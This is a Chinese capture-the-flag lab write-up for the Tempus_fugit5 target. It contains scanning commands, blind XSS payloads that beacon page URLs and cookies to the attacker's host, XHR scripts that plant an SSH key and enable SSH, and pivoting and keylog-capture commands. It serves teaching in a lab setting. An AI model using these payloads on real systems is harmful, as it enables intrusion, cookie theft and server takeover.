富有想象力的XSS盲打:靶机练习之Tempus_fugit5
信息搜集主机发现nmap -sn 192.168.8.0/24端口扫描nmap -sT --min-rate 10000 -p- 192.168.8.3nmap -sT -sC -sV -O 192.168.8.3 -p80只有一个80端口nginx服务器nginx页面泄露了一个邮箱子域名枚举gobuster vhost -u 192.168.8.3 --domain mofo.org -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain拿到三个域名admin.mofo.org www.mofo.org snap.mofo.org一个可以拍摄快照访问页面并截图管理admin提示需要内网ip访问有一个发邮件的位置快照功能测试admin的home页面admin的key页面admin的staff页面admin的logs页面盲打xss抓包测试抓包后发现会先检测csrf字段先测试修改csrf能否成功发送直接删掉csrf也能发送可能后端就没有做任何校验测试出只有邮件字段做了校验注入3个payloadimg srcx onerrornew Image().srchttp://192.168.8.11/xss-01/?uencodeURIComponent(location.href) img srcx onerrornew Image().srchttp://192.168.8.11/xss-02/?uencodeURIComponent(location.href) img srcx onerrornew Image().srchttp://192.168.8.11/xss-03/?uencodeURIComponent(document.cookie)分析一下payload执行流程 1. img srcx 加载失败触发 onerror 2. onerror 新建一个对象 改为攻击者服务器的 URL 3. 发起一次恶意url请求 4. 结束 ps比起onerrorthis.src让客户端陷入死循环和大量服务端噪音日志新建对象会更隐蔽危害性也更小同时记得url编码监听访问日志同步启用kali apache2服务等待一段时间发现xss-03有了回显说明csrf字段是可以注入xss执行js脚本的泄露的文件是一个空白页面尝试偷cookieimgsrc%3dxonerror%3dnewImage().src%3dhttp%3a//192.168.8.11/xss-03/%3fu%3d%2bencodeURIComponent(document.cookie)没有多余的信息 cookie 大概率是 HttpOnly做了限制尝试盲打上传ssh密钥本机生成私钥ssh-keygen -t rsa -b 4096 -f ./id_rsa -C tempus5ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDEwsJhxfzCpxbcaR3GTIOiRoU8pookLx0PWrZ9QW/p65udehTadcB1v3klMMN92fRFIIwAb/xRfvqD6mnubCFi1Vt6wmM7RooG/siD//dVLu5erIaAjBq42Oiq/ovLQafixeNjH/j9qC5Jn1oWtFZGHK0hNlOPzf9bYbnBZRULYyUPn27I70/2KMbPI5z/LpvJfmC10vfyIN1/VzYONK1J7ftOujdLx3t4t2LsWxR3TduV27U0mRT5h2x41yk8YZ41UMg/7Ju5IMoHEtqxGvNPSsTQEI60sPpoDD679/6wzPImQUMkanABCH0SOkLqC2RRvLctveKGwTrUoxIA//QMNYo9AtJIQX734fidLdajR1W7yT1gOfpg3BWBQn1AvxiMUCuZ0mxx6T4t/OJO2IC6LmWmA2Dv5G0QpSKXocWA4JQSGkJBQReztAztP9Jp1lOnvgjJCZwcqL/mwfqgo9YpNJaeKCF9X6wRueX0XGwxOgeC3j7QLQ6OBkb1lvp60zSkLH3DAhihyZvmGu9RMad0IdJ1GgTKBKJc13LpiSG/jZvsLyT9pX219lOIH/CDP11JEYj8aBv02QRn7ookKPHeQUaPRtRmZk3w5yJBJoll5Vsey6e85Q6ZS5YsWhkcnXdJKljEX3vQNhXcG6lCqV02ew7eEZWY8Q tempus5js脚本上传私钥在http://admin.mofo.org/key页面上传文件,xhr提交form表单提交varxhrnewXMLHttpRequest();varformDatanewFormData();varsshKeyssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDEwsJhxfzCpxbcaR3GTIOiRoU8pookLx0PWrZ9QW/p65udehTadcB1v3klMMN92fRFIIwAb/xRfvqD6mnubCFi1Vt6wmM7RooG/siD//dVLu5erIaAjBq42Oiq/ovLQafixeNjH/j9qC5Jn1oWtFZGHK0hNlOPzf9bYbnBZRULYyUPn27I70/2KMbPI5z/LpvJfmC10vfyIN1/VzYONK1J7ftOujdLx3t4t2LsWxR3TduV27U0mRT5h2x41yk8YZ41UMg/7Ju5IMoHEtqxGvNPSsTQEI60sPpoDD679/6wzPImQUMkanABCH0SOkLqC2RRvLctveKGwTrUoxIA//QMNYo9AtJIQX734fidLdajR1W7yT1gOfpg3BWBQn1AvxiMUCuZ0mxx6T4t/OJO2IC6LmWmA2Dv5G0QpSKXocWA4JQSGkJBQReztAztP9Jp1lOnvgjJCZwcqL/mwfqgo9YpNJaeKCF9X6wRueX0XGwxOgeC3j7QLQ6OBkb1lvp60zSkLH3DAhihyZvmGu9RMad0IdJ1GgTKBKJc13LpiSG/jZvsLyT9pX219lOIH/CDP11JEYj8aBv02QRn7ookKPHeQUaPRtRmZk3w5yJBJoll5Vsey6e85Q6ZS5YsWhkcnXdJKljEX3vQNhXcG6lCqV02ew7eEZWY8Q tempus5;varfileBlobnewBlob([sshKey],{type:application/octet-stream});formData.append(file,fileBlob,id_rsa.pub);formData.append(Submit,Submit);xhr.open(POST,http://admin.mofo.org/key,false);xhr.send(formData);注入payloadimg srcx onerrorpayload等待一段时间后成功上传js激活sshvarxhrnewXMLHttpRequest();xhr.open(POST,http://admin.mofo.org/,false);xhr.setRequestHeader(Content-Type,application/x-www-form-urlencoded);xhr.send(SubmitEnableSSH);成功激活端口已经打开用户ctorres跳板机登录ssh -p2222 ctorres192.168.8.3 -i id_rsa登录提示被一块垫脚石中止联想到有一个内网的ip192.168.150.1尝试跳板机登录ssh -i id_rsa -J ctorres192.168.8.3:2222 ctorres192.168.150.1依然报错查看日志ssh -i id_rsa -J ctorres192.168.8.3:2222 ctorres192.168.150.1 -vv需要校验root目录下面的密钥把文件复制到对应目录成功拿到shell提权邮件文件泄露send文件中显示员工ctorres似乎和上级领导有矛盾发了一个邮件给外部人员提示注入了payload还有两个内部iphosts解析信息泄露127.0.0.1 localhost 127.0.1.1 TempusFugit5.mofo.org TempusFugit5 192.168.150.1 tempusfugit5.mofo.org 192.168.150.10 snap.mofo.org 192.168.150.11 www.mofo.org 192.168.150.13 surfer.mofo.org 192.168.150.15 pass.mofo.org 192.168.150.1 admin.mofo.orgpass.mofo.org被植入了恶意脚本似乎是监听键盘按键的流量劫持python3 -m http.server --bind 192.168.150.1 4444 | tee keys.loggrep -iE key keys.log | tee keys.logawk -Fkey {print $2} keys.log | awk {printf %c, $1}hjanusisHi5CmhKNl9Tr0vVB拿到了账号和密码端口转发两种端口转发都可以ssh -i id_rsa -J ctorres192.168.8.3:2222 -L 81:192.168.150.15:80 ctorres192.168.150.1 -Nssh -o ProxyCommandssh -i ./id_rsa -W %h:%p -p 2222 ctorres192.168.8.3 -N -L 81:192.168.150.15:80 -i id_rsa ctorres192.168.150.1session存活时间改一下成功登录root密码,sdrXCaNaKj成功拿到root